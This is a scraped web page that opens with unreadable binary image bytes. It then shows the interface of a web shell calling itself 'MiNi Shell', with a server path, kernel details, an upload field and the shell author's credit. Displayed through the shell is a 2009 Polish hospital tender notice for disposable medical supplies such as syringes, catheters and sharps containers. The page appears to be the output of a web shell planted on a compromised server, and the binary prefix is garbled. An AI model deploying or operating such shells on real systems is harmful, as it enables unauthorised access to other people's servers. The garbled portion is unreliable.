JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090129/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090129/11678-N-2009.html

<p class="kh_header"><b>Lublin: Sprzęt medyczny jednorazowego użytku -umowa na okres 1-go roku  (nr sprawy: EO-2732/5/09)</b><br>
<b>Numer ogłoszenia: 11678 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 1 w Lublinie , ul. Stanisława Staszica 16, 20-081 Lublin, woj. lubelskie, tel. 081 5323935, 5325043, 5328330, faks 081 5329486.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spsk1.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzęt medyczny jednorazowego użytku -umowa na okres 1-go roku  (nr sprawy: EO-2732/5/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie1-22 pozycje; 
Zadanie. 2 - 3 pozycje,
Zadanie 3- 6 pozycji,
Zadanie 4- 2 pozycje, 
Zadanie5- 2 pozycje.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.16.41-5, 33.15.71.10-9, 33.19.00.00-8, 33.79.30.00-5, 38.43.70.00-7, 33.14.11.23-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca musi spełniać warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień    publicznych (t.j. DZ. U. NR 223/2007, poz. 1655 oraz z 2008 Nr 171 poz. 1058.).   
Oceny spełnienia tych warunków Zamawiający dokona na podstawie n/w dokumentów  :.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 oraz spełnia warunki ubiegania się o udzielenie zamówienia określone w art. 22 ust. 1 pkt 1 - 3  ustawy, na formularzu oświadczenia stanowiącym Załącznik Nr 6 do SIWZ. W przypadku niedysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy w ofercie złożyć pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne   przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentu, o którym mowa w: punkcie 2 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że  a)nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wczesniej niż 6 m-cy przed upływem terminu   składania ofert.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa w pkt 3 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania- wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU  POTWIERDZENIA, ŻE OFEROWANE DOSTAWY ODPOWIADAJĄ WYMAGANIOM OKREŚLONYM PRZEZ ZAMAWIAJĄCEGO
1.Do oferty należy dołączyć oświadczenie o posiadaniu wszelkich wymaganych dla danego towaru dokumentów dopuszczających do stosowania na rynku polskim ( np. deklaracja zgodności wraz z certyfikatem jednostki notyfikowanej lub wpis do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używanie lub inny dokument równoważny). 
2.Zamawiający wymaga, aby do oferty dołączyć katalogi / ulotki lub foldery zawierające dokładne opisy zaoferowanego sprzętu w języku polskim, z zaznaczeniem którego zadania i pozycji opisy dotyczą (jeżeli katalog lub ulotka jest w języku obcym wymagane jest tłumaczenie na język polski).
3.Do oferty należy dołączyć próbki określone w części III SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spsk1.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Kliniczny Nr 1 w Lublinie, ul. St. Staszica 16, 20-081 Lublin, Sekcja ds. Zamówień Publicznych, Budynek Dyrekcji - pokój nr 1
Cena SIWZ: 10 zł + VAT.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 12:00, miejsce: Kancelaria Szpitala, pokój nr 5. Ul. Staszica 16, 20-081 Lublin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Strzykawki 2ml - 144000szt.2. Strzykawki     5ml - 144000szt.3. Strzykawki 10ml-240000szt.4.Strzykawki 20ml - 264000szt.5. Strzykawki 50ml - 24000szt.6. Strzykawki 100ml- 9600szt. 7. Strzykawka do insuliny 1ml - 14400szt.8. Strzykawki 50ml- bursztynowe- 1800szt.9. Strzykawka do tuberkuliny TBC z igłą - 9000szt.10. Cewnik Nelaton nr 6  - 3600szt.11. Cewnik Nelaton nr 8   - 600szt.12. Cewnik Nelaton nr 10  - 960szt.13. Cewnik Nelaton nr 12  - 1440szt.14. Cewnik Nelaton nr 14   - 1680szt.15. Cewnik Nelaton nr 16    - 1200szt.16. Cewnik Nelaton nr 18 - 1200szt.17. Cewnik do kontrolowanego odsysania nr . 14   - 9600szt.18. Cewnik do kontrolowanego odsysania nr. 16 - 8400szt.19. Cewnik do kontrolowanego odsysania nr. 18 - 3000szt.20. Zgłębnik żołądkowy nr.14  - 1200szt.21. Zgłębnik żołądkowy nr.16  - 1200szt.22. Zgłębnik żołądkowy nr.18  - 600szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.12.00-2, 33.14.16.41-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cewnik do podawania tlenu przez nos(wąsy tlenowe)- 6000szt.2. Maska dla dorosłych do terapii tlenowej  z zaciskiem na nos - 5400szt.3. Rura aerozolowa- 9000mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.41-5, 33.15.71.10-9, 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łopatka (szpatułka) językowa - 19200szt.2.	Bagietka szklana do maści - 1200szt.3.	Patyczki do wymazów-sterylne - 8400szt.4.	Kapturki (osłonki) do termometru elektronicznego  BRAUN- 36000szt.5.	Osłonki do termometru elektronicznego  HARTMANN - 60000szt.6.	Prześcieradła jednorazowego użytku w roli - 24000mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pojemniki na ostre odpady medyczne od 0,3L do 0,7L- 4800szt.
2.	Pojemniki na ostre odpady medyczne od 1,9L do 2,2L- 6000szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.23-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kapilary szklane z heparyną litową - 6000szt.
2.	Zatyczki do ww kapilar - 11000szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com